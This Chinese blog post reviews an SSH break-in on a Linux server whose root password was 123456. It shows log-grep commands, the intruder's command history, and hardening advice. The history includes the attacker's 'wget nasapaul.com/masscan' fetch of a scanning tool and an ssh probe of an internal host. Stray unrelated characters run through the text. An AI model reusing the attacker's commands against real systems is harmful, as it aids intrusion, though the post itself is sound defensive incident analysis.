你有多少密碼是123456

root密碼被修改

新裝機的Linux服務(wù)器替換老服務(wù)器茉兰,并且接通了外網(wǎng)尤泽,之前一直以為外網(wǎng)SSH的22端口是不通的,都是在內(nèi)網(wǎng)跳板機SSH登陸规脸,所以沒太注意密碼復(fù)雜度坯约,裝機時root密碼設(shè)為123456了。而實際上外網(wǎng)的22端口是開放的莫鸭。第二天發(fā)現(xiàn)SSH登陸不了闹丐,提示密碼錯誤。運維人員進入機房
采用單用戶模式進入服務(wù)器修改密碼黔龟,才又可以登陸妇智。


image

拿回密碼之后排查被入侵過程如下。

誰成功登陸過氏身?

[root@localhost home]# grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'      #secure文件每周歸檔加上-歸檔時間巍棱,如果查上周登陸將secure改為secure-上周最后一天日期
Jun 08 21:21:26 root 10.1.1.5        #登錄成功的日期、時間蛋欣、用戶名航徙、IP
Jun 08 22:52:48 root 10.1.1.5      【跳板機使用123456登陸】
Jun 08 23:24:27 root 10.1.1.5    
Jun 09 00:08:29 root 194.165.16.45  【俄羅斯IP,外網(wǎng)使用123456登陸】
Jun 09 01:19:39 root 223.112.28.14  【南京IP陷虎,外網(wǎng)使用123456登陸】
Jun 09 01:20:16 root 92.80.248.158  【羅馬尼亞IP到踏,外網(wǎng)使用123456登陸】
Jun 09 16:06:38 root 10.1.1.5      
Jun 09 16:10:00 root 10.1.1.5    【單用戶修改密碼后跳板機可以登陸】

執(zhí)行g(shù)rep "Failed password for root" /var/log/secure | awk '{print $11}' 查看看自己的服務(wù)器有沒有人嘗試破解

入侵者登陸后做了什么?

[root@localhost home]#history | more 【去除自己執(zhí)行的指令尚猿,剩下的就是入侵者的指令】
  548 w    【查看登陸用戶】
  549 ls
  550 free -mt   【查看內(nèi)存】
  551  lscpu
  552  cat /proc/cpu info
  553  cat /pro/cpcuinfo    #查看cpu信息
  554  cat /proc/cpuinfo
  555  ifconfig
  556  ssh 10.1.1.26  【嘗試內(nèi)網(wǎng)其它服務(wù)器窝稿,如果其它服務(wù)器密碼簡單也會被攻陷】
  557  w
  558  passwd    【修改root密碼】
  559  wget nasapaul.com/masscan   【下載端口掃描工具,沒成功】
  560  wget
  561  ls
  562  df -h
  563  nvidia-smi
  564  w
  565  ls
  566  cat /etc/hosts
  567  top

入侵者沒有過多操作凿掂,改了root密碼就離開了伴榔。不太清楚他會以后再來,還是到此為止庄萎。搜索nasapaul踪少,可以看到一些其它服務(wù)器被攻擊的信息,網(wǎng)上有個羅馬尼亞黑客網(wǎng)名叫paul糠涛,高調(diào)囂張援奢,專門入侵服務(wù)器,并且不斷在內(nèi)網(wǎng)破解其它服務(wù)器的密碼忍捡,利用服務(wù)器算力挖門羅幣集漾。結(jié)合登陸IP有羅馬尼亞地址切黔,很可能就是這個人。
他在這臺服務(wù)器上只修改了密碼就離開了帆竹,沒有部署挖礦程序绕娘。

結(jié)論

替換之前的老服務(wù)器外網(wǎng)端口也是開的脓规,但是多年未被登陸栽连,就是因為密碼比較復(fù)雜。
此事的教訓(xùn)就是

  • root密碼一定要有復(fù)雜度侨舆,一方面你認為不通外網(wǎng)的服務(wù)器未必不通外網(wǎng)秒紧。另一方面,和你同一局域網(wǎng)的機器被控制了挨下,入侵者以它為跳板熔恢,你也直接面臨來自外網(wǎng)的破解。
  • 123456可能是最弱的密碼臭笆,六個1可能都更好叙淌。
  • 互聯(lián)網(wǎng)SSH端口一定關(guān)閉。
  • 修改/etc/ssh/sshd_config里的Port值為22之外的值愁铺,能增加破解難度鹰霍。
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市茵乱,隨后出現(xiàn)的幾起案子茂洒,更是在濱河造成了極大的恐慌,老刑警劉巖瓶竭,帶你破解...
    沈念sama閱讀 222,183評論 6 516
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件督勺,死亡現(xiàn)場離奇詭異,居然都是意外死亡斤贰,警方通過查閱死者的電腦和手機智哀,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,850評論 3 399
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來荧恍,“玉大人瓷叫,你說我怎么就攤上這事】榻龋” “怎么了赞辩?”我有些...
    開封第一講書人閱讀 168,766評論 0 361
  • 文/不壞的土叔 我叫張陵,是天一觀的道長授艰。 經(jīng)常有香客問我辨嗽,道長,這世上最難降的妖魔是什么淮腾? 我笑而不...
    開封第一講書人閱讀 59,854評論 1 299
  • 正文 為了忘掉前任糟需,我火速辦了婚禮屉佳,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘洲押。我一直安慰自己武花,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 68,871評論 6 398
  • 文/花漫 我一把揭開白布杈帐。 她就那樣靜靜地躺著体箕,像睡著了一般。 火紅的嫁衣襯著肌膚如雪挑童。 梳的紋絲不亂的頭發(fā)上累铅,一...
    開封第一講書人閱讀 52,457評論 1 311
  • 那天,我揣著相機與錄音站叼,去河邊找鬼娃兽。 笑死,一個胖子當(dāng)著我的面吹牛尽楔,可吹牛的內(nèi)容都是我干的投储。 我是一名探鬼主播,決...
    沈念sama閱讀 40,999評論 3 422
  • 文/蒼蘭香墨 我猛地睜開眼阔馋,長吁一口氣:“原來是場噩夢啊……” “哼玛荞!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起垦缅,我...
    開封第一講書人閱讀 39,914評論 0 277
  • 序言:老撾萬榮一對情侶失蹤冲泥,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后壁涎,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體凡恍,經(jīng)...
    沈念sama閱讀 46,465評論 1 319
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,543評論 3 342
  • 正文 我和宋清朗相戀三年怔球,在試婚紗的時候發(fā)現(xiàn)自己被綠了嚼酝。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 40,675評論 1 353
  • 序言:一個原本活蹦亂跳的男人離奇死亡竟坛,死狀恐怖闽巩,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情担汤,我是刑警寧澤涎跨,帶...
    沈念sama閱讀 36,354評論 5 351
  • 正文 年R本政府宣布,位于F島的核電站崭歧,受9級特大地震影響隅很,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜率碾,卻給世界環(huán)境...
    茶點故事閱讀 42,029評論 3 335
  • 文/蒙蒙 一叔营、第九天 我趴在偏房一處隱蔽的房頂上張望屋彪。 院中可真熱鬧,春花似錦绒尊、人聲如沸畜挥。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,514評論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽蟹但。三九已至,卻和暖如春勘究,著一層夾襖步出監(jiān)牢的瞬間矮湘,已是汗流浹背斟冕。 一陣腳步聲響...
    開封第一講書人閱讀 33,616評論 1 274
  • 我被黑心中介騙來泰國打工口糕, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人磕蛇。 一個月前我還...
    沈念sama閱讀 49,091評論 3 378
  • 正文 我出身青樓景描,卻偏偏與公主長得像,于是被迫代替她去往敵國和親秀撇。 傳聞我的和親對象是個殘疾皇子超棺,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,685評論 2 360

推薦閱讀更多精彩內(nèi)容